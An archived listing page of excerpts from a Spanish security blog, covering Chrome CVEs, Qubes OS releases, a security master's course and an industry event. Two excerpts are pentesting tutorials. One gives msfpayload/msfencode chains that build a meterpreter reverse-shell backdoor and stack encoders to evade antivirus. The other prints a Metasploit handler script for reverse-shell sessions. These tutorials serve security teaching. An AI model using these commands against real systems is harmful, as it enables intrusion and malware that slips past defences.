archive-es.com » ES » S » SEGURIDADPARATODOS.ES

Total: 160

Choose link from "Titles, links and description words view":

Or switch to "Titles and links view".
  • Urgente: Actualización de Seguridad en Google Chrome corrige multiples vulnerabilidades
    Google Chrome 14 0 835 202 Si el Navegador no se encuentra configurado para que realice las actualizaciones de forma automática puede actualizarlo desde la opción Acerca de Google Chrome del menú de herramientas seleccionando la opción Actualizar Detalles técnicos de las Vulnerabilidades High CVE 2011 2876 Use after free in text line box handling Credit to miaubiz High CVE 2011 2877 Stale font in SVG text handling Credit to miaubiz High CVE 2011 2878 Inappropriate cross origin access to the window prototype Credit to Sergey Glazunov High CVE 2011 2879 Lifetime and threading issues in audio node handling Credit to Google Chrome Security Team Inferno High CVE 2011 2880 Use after free in the v8 bindings Credit to Sergey Glazunov High CVE 2011 2881 Memory corruption with v8 hidden objects Credit to Sergey Glazunov C ritical CVE 2011 3873 Memory corruption in shader translator Credit to Zhenyao Mo of the Chromium development community Fuentes US CERT Google Chrome Releases Por Julián Gonzalez Publicado el 10 04 2011 11 21 00 p m Etiquetas Actualización Chrome Google Navegador Seguridad US CERT Vulnerabilidad No hay comentarios Publicar un comentario en la entrada Suscribirse a Enviar comentarios Atom Entrada más reciente Entrada

    Original URL path: http://www.seguridadparatodos.es/2011/10/urgente-actualizacion-de-seguridad-en.html (2016-04-29)
    Open archived version from archive


  • Metasploit: de ENCODING y PAYLOAD va la cosa (II)
    encoding al PAYLOAD se necesita que éste se encuentre en el formato RAW en bruto para lo cuál se tiene que indicar el formato a la hora de generar el PAYLOAD Paso 2 Crear un PAYLOAD en formato RAW para que msfencode pueda trabajar con él Para ello se tiene dos formas de hacer la primera es generar un fichero RAW e indicar a msfencode que utilice dicho fichero para generar el nuevo ejecutable EXE La segunda manera más sencilla es aprovechar la capacidad que tiene Linux de concatenar comandos donde la salida de uno es la entrada del siguiente veamos como se realiza con un ejemplo root ST2Labs msfpayload windows patchupmeterpreter reverse tcp LHOST 192 168 2 105 R msfencode e x86 shikata ga nai c 10 b x00 t exe o backdoor2 exe msfencode Técnica de encodigo x86 shikata ga nai Si se observa la imagen anterior se puede apreciar que Se ha añadido la letra R significa que el PAYLOAD utilice el formato RAW ver msfpayload h Se ha utilizado la técnica x86 shikata ga nai por ser la técnica que ofrece el mejor resultado con 10 iteraciones Además se ha indicado que evite la utilización de los caracteres x00 en la generación del ejecutable que son comunes en los shellcode Paso 3 Comprobar si los Sistemas Antivirus detectan el ejecutable generado para ello lo subimos a Virtustotal y el resultado es Detección con Virustotal es Qué hacemos ahora Nuestro primer intento no ha tenido éxito lo detecta prácticamente todos los motores de antivirus en particular los principales y más utilizados sistema de antivirus Esto solo significa que hay que seguir trabajando Y que mejor que hacerlo con más ejemplos Paso 4 Aplicar varias capaz de encoding en cascada para generar el ejecutable final A continuación voy a poner los comandos que he utilizado pero omitiré algunos pasos obvios del proceso para evitar caer en un bucle repetitivo root ST2Labs msfpayload windows patchupmeterpreter reverse tcp LHOST 192 168 2 105 R msfencode e php base64 c 2 t raw msfencode e x86 shikata ga nai c 10 b x00 t exe o backdoor3 exe El archivo backdoor3 exe sigue siendo detectado por la mayoría de los motores de Antivirus vamos a intentar una vez más pero probando otras combinaciones y añadiendo más técnicas de evasión tal que así root ST2Labs msfpayload windows patchupmeterpreter reverse tcp LHOST 192 168 2 105 R msfencode e php base64 c 2 t raw msfencode e x86 shikata ga nai c 5 t raw msfencode e x86 jmp call additive c 2 t raw msfencode e x86 shikata ga nai c 5 b xff t raw msfencode e x86 alpha mixed c 1 t exe o backdoor4 exe Nota si durante el proceso en alguna de las iteraciones obtenemos un error bad character se debe a la restricción impuesta de no utilizar cierto tipo de caracteres por lo que deberemos de eliminar dicho parámetro cambiar de el tipo de caracteres y si

    Original URL path: http://www.seguridadparatodos.es/2013/03/Metasploit-Encoding-payload2.html (2016-04-29)
    Open archived version from archive

  • [Qubes-OS]: The Next Security OS Generation
    I obtain it Screenshots Amazing In this example the word processor runs in the work domain which has been assigned green label and is fully isolated from other domains such as the red domain assigned the red label Watch out Danger used for random Web browsing news reading etc Apps from different domains run in different AppVMs and have different X servers filesystems etc Notice the different color frames labels and VM names in the titlebar these are drawn by the trusted Window Manager running in Dom0 and apps running in domains cannot fake them Different Security AppVMs Domains This feature is one of my favorites All the networking runs in a special unprivileged NetVM notice the red frame around the NetworkManager dialog box on the screen bellow Thanks to this a potential compromise of your network card driver or WiFi stack or DHCP client would not affect the integrity of the rest of the system This feature requires Intel VT d or AMD IOMMU hardware e g Core i5 i7 systems Network Managed in Insolation NetVM Downloading The most important documentation about the project is store and share it in the following wiki system http wiki qubes os org trac The Installation guide provide all you need to know for install and prepare your equipment before start the configuration process You can download the ISO and the digital signature for the ISO from here http s3 eu west 1 amazonaws com qubes os iso Qubes R1 Beta2 x86 64 DVD iso http s3 eu west 1 amazonaws com qubes os iso Qubes R1 Beta2 x86 64 DVD iso asc See this page for more info about how to download and verify our GPG keys Then verify the downloaded ISO gpg v iso asc It s so important to know the System requeriments Minimum 4GB of RAM 64 bit Intel or AMD processor x86 64 aka x64 aka AMD64 Intel GPU strongly preferred if you have Nvidia GPU prepare for some troubleshooting we haven t tested ATI hardware 10GB of disk Note that it is possible to install Qubes on an external USB disk so that you can try it without sacrificing your current system Mind however that USB disks are usually SLOW Fat SSD disk strongly recommended Additional requirements Intel VT d or AMD IOMMU technology this is needed for effective isolation of your network VMs How Can I install Qube OS in an USB Stick The response to this cuestion can be find out in the following guide This is all Do you like this OS I suppose that is yes Por Julián Gonzalez Publicado el 1 23 2012 11 10 00 a m Etiquetas AppVMs Desktop Computing Generation Insolation Next OS Qubes OS Security Virtual System VM 3 comentarios B1nary0 17 oct 2012 6 29 00 i can t install qube os in my USB Stick the installation sample not found images install img but the file is there which is the problem i select dev sdb1

    Original URL path: http://www.seguridadparatodos.es/2012/01/qubes-os-next-os-generation.html (2016-04-29)
    Open archived version from archive

  • [Pentesting] Deploying rogue ap points throughout a domain
    network worm The meterpreter script assumes that you have AT LEAST Administrator privileges you need obtain this privileges before run script Example of use with metasploit console script Download it 2 Quick RC script to demonstrate the Ruby blocks in RC files 3 4 5 6 Generate a corresponding EXE using msfpayload change 192 168 0 228 to your IP 7 msfpayload windows meterpreter reverse tcp LHOST 192 168 0 228 LPORT 4444 X reverse exe 8 9 10 use exploit multi handler 11 set PAYLOAD windows meterpreter reverse tcp 12 set LPORT 4444 13 set LHOST 192 168 0 228 14 set ExitOnSession false 15 16 exploit j 17 18 The first sleep below is not necessary but makes the output cleaner 19 ruby 20 sleep 1 21 22 print status Waiting on an incoming sessions 23 while true 24 framework sessions each pair do sid s 25 thost s tunnel peer split 0 26 27 Ensure that stdapi has been loaded before running 28 if s ext aliases stdapi 29 print status Screenshotting session sid thost 30 s console run single screenshot p thost sid jpg v false q 85 31 print status Closing session sid thost 32 s kill 33 else 34 print status Session sid thost active but not yet configured 35 end 36 37 end 38 sleep 1 39 end 40 41 print status All done 42 ruby 43 44 Kill all open sessions 45 sessions K 46 47 Exit the console optional 48 exit Donwload rogue ap script Por Julián Gonzalez Publicado el 10 10 2011 09 58 00 a m Etiquetas AP Exploit Metasploit Meterpreter Pentester Rogue No hay comentarios Publicar un comentario en la entrada Suscribirse a Enviar comentarios Atom Entrada más reciente Entrada antigua Historico Historico abril 1 marzo 1 diciembre

    Original URL path: http://www.seguridadparatodos.es/2011/10/pentesting-deploying-rogue-ap-points.html (2016-04-29)
    Open archived version from archive

  • Máster Seguridad en Tecnologías de la Información y las Comunicaciones
    de algún titulo universitario graduado o equivalente o superior preferentemente en ingeniería Coste del Curso 1 696 se Ofrecen 2 Becas con reducción del 50 Preinscripción y matrícula entre el 1 y el 20 de Septiembre de 2013 Se ofertan 18 plazas Curso Avanzado Diploma Universitario Especialista en Seguridad TIC nivel Avanzado Es un curso avanzado para perfeccionar lo aprendido en el curso Base y adquirir nuevos conocimientos de nivel avanzado además El curso tiene 30 créditos ECTS con 98 horas presenciales en los módulos 1 5 Las clases presenciales se realizan los viernes 4 30 8 30 y sábados 9 30 13 30 entre Febrero y Mayo incluidos A la finalización se obtiene un Diploma de Especialista en Seguridad TIC nivel Avanzado Titulación Oficial Contenido y profesorado Contenido Curso Avanzado Diploma Especialista Seguridad TIC nivel Avanzado Donde y cuando se imparte En Sevilla En la Escuela Superior de Ingenieros C Camino de los descubrimientos s n Isla de la Cartuja Entre el 2 de Febrero de 2014 y el 31 Mayo de 2014 fechas orientativas Admisión y Matricula Es necesario haber superado el 60 del título de Experto en Seguridad nivel básico o equivalente a evaluar por comisión académica Plazo de matrícula Coste del Curso 1 696 se Ofrecen 2 Becas con reducción del 50 Preinscripción y matrícula entre el 1 20 de enero de 2014 Solamente 18 plazas Novedad Si Tiene como requisito hacer 70h de prácticas en una de las empresas colaboradoras El 56 de las clases se imparte en Laboratorios de la ESI Titulación Oficial de Máster en Seguridad TIC Para ello se debe de cursar el Trabajo Fin de Máster ello consiste en un trabajo académicamente dirigido por el profesorado del Máster El trabajo tiene asignados 6 créditos ECTS unas 150 horas de trabajo total

    Original URL path: http://www.seguridadparatodos.es/2013/06/master-seguridad-en-tecnologias-de-la.html (2016-04-29)
    Open archived version from archive

  • [EVENTO] La Voz de la Industria: La situación de la Ciberseguridad Industrial en España
    de Actos Cuando 20 de Junio 9 30h Temática En este evento se presentará el Mapa de Ruta de la Ciberseguridad Industrial en España 2013 2014 en el que han participado las principales organizaciones privadas e instituciones públicas INTECO y CNPIC nos darán su visión de la Participación Público Privada como mecanismo fundamental para mejorar la Ciberseguridad Industrial en España Se mostrarán los desafíos de Ciberseguridad en Smart Grid una de las principales preocupaciones del gobierno y de las compañías eléctricas En el evento se presentará los retos que deberán afrontar los proveedores de servicios de Ciberseguridad Industrial Contaremos con la presencia de Usuarios finales como Cepsa e Iberdrola Instituciones públicas como Inteco y CNPIC y Proveedores para debatir en una mesa redonda sobre los éxitos y fracasos de la concienciación en Ciberseguridad Industrial Este evento está dirigido a todas las organizaciones y profesionales interesados en mejorar la Ciberseguridad industrial en Iberoamérica y especialmente a los más de 300 miembros con los que cuenta el Centro Más Información http www cci es org Vía www grupocontrol com INTECO Por Julián Gonzalez Publicado el 6 17 2013 12 40 00 p m Etiquetas CCI Ciberseguridad España Eventos Noticias Seguridad 2 comentarios Arkangel gammar 17 jun 2013 19 10 00 Es trasmitido a través de internet saludos Responder Eliminar Julián Gonzalez 18 jun 2013 9 44 00 Hola Arkangel De momento no tengo constancia de que se vaya a retransmitir por Internet estaremos atentos por si ese fuera el caso Un Saludo Responder Eliminar Añadir comentario Cargar más Suscribirse a Enviar comentarios Atom Entrada más reciente Entrada antigua Historico Historico abril 1 marzo 1 diciembre 3 noviembre 1 octubre 1 julio 1 junio 1 mayo 4 abril 3 enero 1 diciembre 1 noviembre 1 octubre 2 junio 2 mayo 5 abril 4

    Original URL path: http://www.seguridadparatodos.es/2013/06/evento-la-voz-de-la-industria-la.html (2016-04-29)
    Open archived version from archive

  • [QUBES-OS] NEW RELEASE R2 RC1 IS OUT!
    para evitar que las acciones o eventos sucedidos en uno afectará a los otros por ejemplo que la navegación por Internet pudiera significar una amenaza o riesgo para el usuario Con la versión R2 RC1 llegan importantes mejoras en la parte gráfica donde la plantilla por defecto para la interfaz gráfica ha sido actualizada a Fedora 20 y además se han solucionado numerosos fallos de la versión anterior Además ya soporta virtualización de aplicaciones windows en pantalla completa una de las características más esperadas en QubesOS Download http sourceforge net projects qubesos files Qubes R2 rc1 x86 64 DVD iso download http wiki qubes os org trac wiki QubesDownloads Instalación de QubesOS R2 RC1 http wiki qubes os org trac wiki InstallationGuideR2rc1 ST2Labs www st2labs com Por Julián Gonzalez Publicado el 4 23 2014 10 13 00 a m Etiquetas AppVMs OS Qubes Qubes OS R2RC1 VM Windows XEN No hay comentarios Publicar un comentario en la entrada Suscribirse a Enviar comentarios Atom Entrada más reciente Entrada antigua Historico Historico abril 1 marzo 1 diciembre 3 noviembre 1 octubre 1 julio 1 junio 1 mayo 4 abril 3 enero 1 diciembre 1 noviembre 1 octubre 2 junio 2 mayo 5

    Original URL path: http://www.seguridadparatodos.es/2014/04/qubes-os-new-release-r2-rc1-is-out.html (2016-04-29)
    Open archived version from archive

  • [Qubes-OS] New Release beta3 is Out!
    makes mounting USB devices to any user AppVM very easy no matter which actual VM is handling the USB controller So this allows to have untrusted USB domain s almost seamlessly integrated in the desktop system One can consider to use it in order to prevent various USB attacks The next release the 1 0 will bring this feature to the Qubes GUI manager as well making it easy to use for non command line users too Furthermore now you can do the deployment your own Qubes OS distro more easily with the new capability implemented in beta 3 have now introduced fully automatic Qubes build system that allows to build all the Qubes packages and also create the installation ISO with just one command More information on this system and on how to use it can be found in the ç Installation and Downloading all you need to know will find in the Installation Guide Or if you prefer you can download the new ISO now The ISO and the digital signature for the ISO from here http s3 eu west 1 amazonaws com qubes os iso Qubes R1 Beta3 x86 64 DVD iso http s3 eu west 1 amazonaws com qubes os iso Qubes R1 Beta3 x86 64 DVD iso asc Via Jorge Sanz and The Invisible Things Labs Por Julián Gonzalez Publicado el 2 06 2012 01 28 00 p m Etiquetas AppVMs Beta3 Desktop Computing Insolation Next Security OS Generation OS Qubes OS Virtual System No hay comentarios Publicar un comentario en la entrada Suscribirse a Enviar comentarios Atom Entrada más reciente Entrada antigua Historico Historico abril 1 marzo 1 diciembre 3 noviembre 1 octubre 1 julio 1 junio 1 mayo 4 abril 3 enero 1 diciembre 1 noviembre 1 octubre 2 junio 2 mayo 5

    Original URL path: http://www.seguridadparatodos.es/2012/02/qubes-os-new-release-beta3-is-out.html (2016-04-29)
    Open archived version from archive